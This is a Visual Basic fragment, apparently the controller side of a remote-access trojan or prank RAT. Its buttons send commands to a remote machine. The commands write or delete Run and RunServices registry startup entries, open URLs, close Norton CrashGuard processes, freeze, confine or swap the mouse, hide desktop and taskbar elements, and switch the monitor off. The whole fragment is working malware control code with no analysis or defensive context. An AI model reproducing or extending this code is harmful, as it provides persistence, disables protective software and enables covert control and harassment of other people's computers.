If Index = "0" Then AddRegName$ = InputBox("Enter String Value Name", ""): Send "RegNameRun" + AddRegName$: AddRegData$ = InputBox("Enter String Value Data", ""): Send "RegDataRun" + AddRegData$ 'Add Run
If Index = "1" Then AddRegName$ = InputBox("Enter String Value Name", ""): Send "RegNameRunSerVices" + AddRegName$: AddRegData$ = InputBox("Enter String Value Data", ""): Send "RegDataRunSerVices" + AddRegData$ 'Add RunServices
If Index = "2" Then Send "RegDel": msg = MsgBox("Registry Startup Contents Deleted!!!", vbInformation, "") 'Delete Run + RunServices
If Index = "3" Then URL$ = InputBox("Enter URL to Start", ""): Send "URL" + URL$ 'Start URL
If Index = "4" Then Send "CText" 'Clear Text
If Index = "5" Then Send "CloseAPPic": Send "CloseAPPcgmenu": Send "CloseAPPcg16eh": Send "CloseAPPcg32eh" 'Close Norton CrashGuard"
If Index = "7" Then Form6.Visible = True 'MessageBox
If Index = "8" And Command1(8).Caption = "Freeze" Then Send "JMouse": Command1(8).Caption = "Free": Exit Sub 'Freeze Mouse
If Index = "8" And Command1(8).Caption = "Free" Then Send "FMouse": Command1(8).Caption = "Freeze": Exit Sub 'Free Mouse
If Index = "9" And Command1(9).Caption = "Confine" Then Send "CMouse": Command1(9).Caption = "Free": Exit Sub 'Confine Mouse"
If Index = "9" And Command1(9).Caption = "Free" Then Send "FMouse": Command1(9).Caption = "Confine": Exit Sub 'Free Mouse
If Index = "10" And Command1(10).Caption = "Swap" Then Send "SMouse": Command1(10).Caption = "Restore": Exit Sub 'Swap Mouse Buttons
If Index = "10" And Command1(10).Caption = "Restore" Then Send "RMouse": Command1(10).Caption = "Swap": Exit Sub 'Restore Mouse Buttons
If Index = "11" And Command1(11).Caption = "Hide" Then Send "HideD": Command1(11).Caption = "Show": Exit Sub 'Hide Desktop
If Index = "11" And Command1(11).Caption = "Show" Then Send "ShowD": Command1(11).Caption = "Hide": Exit Sub 'Show Desktop
If Index = "12" And Command1(12).Caption = "Hide" Then Send "HideT": Command1(12).Caption = "Show": Exit Sub 'Hide Taskbar
If Index = "12" And Command1(12).Caption = "Show" Then Send "ShowT": Command1(12).Caption = "Hide": Exit Sub 'Show Taskbar
If Index = "13" And Command1(13).Caption = "Hide Button" Then Send "HideTB": Command1(13).Caption = "Show Button": Exit Sub 'Hide Taskbar Button
If Index = "13" And Command1(13).Caption = "Show Button" Then Send "ShowTB": Command1(13).Caption = "Hide Button": Exit Sub 'Show Taskbar Button
If Index = "14" And Command1(14).Caption = "Hide Icons" Then Send "HideTI": Command1(14).Caption = "Show Icons": Exit Sub 'Hide Taskbar Icons
If Index = "14" And Command1(14).Caption = "Show Icons" Then Send "ShowTI": Command1(14).Caption = "Hide Icons": Exit Sub 'Show Taskbar Icons
If Index = "15" And Command1(15).Caption = "Hide Tabs" Then Send "HideTTabs": Command1(15).Caption = "Show Tabs": Exit Sub 'Hide Taskbar Tabs
If Index = "15" And Command1(15).Caption = "Show Tabs" Then Send "ShowTTabs": Command1(15).Caption = "Hide Tabs": Exit Sub 'Show Taskbar Tabs
If Index = "16" And Command1(16).Caption = "Hide Tray" Then Send "HideTTray": Command1(16).Caption = "Show Tray": Exit Sub 'Hide Taskbar Tray
If Index = "16" And Command1(16).Caption = "Show Tray" Then Send "ShowTTray": Command1(16).Caption = "Hide Tray": Exit Sub 'Show Taskbar Tray
If Index = "17" And Command1(17).Caption = "Hide Clock" Then Send "HideTClock": Command1(17).Caption = "Show Clock": Exit Sub 'Hide Taskbar Clock
If Index = "17" And Command1(17).Caption = "Show Clock" Then Send "ShowTClock": Command1(17).Caption = "Hide Clock": Exit Sub 'Show Taskbar Clock
If Index = "18" And Command1(18).Caption = "Off" Then Send "MonitorOff": Command1(18).Caption = "On": Exit Sub 'Off Monitor
If Index = "18" And Command1(18).Caption = "On" Then Send "MonitorOn": Command1(18).Caption = "Off": Exit Sub 'On Monitor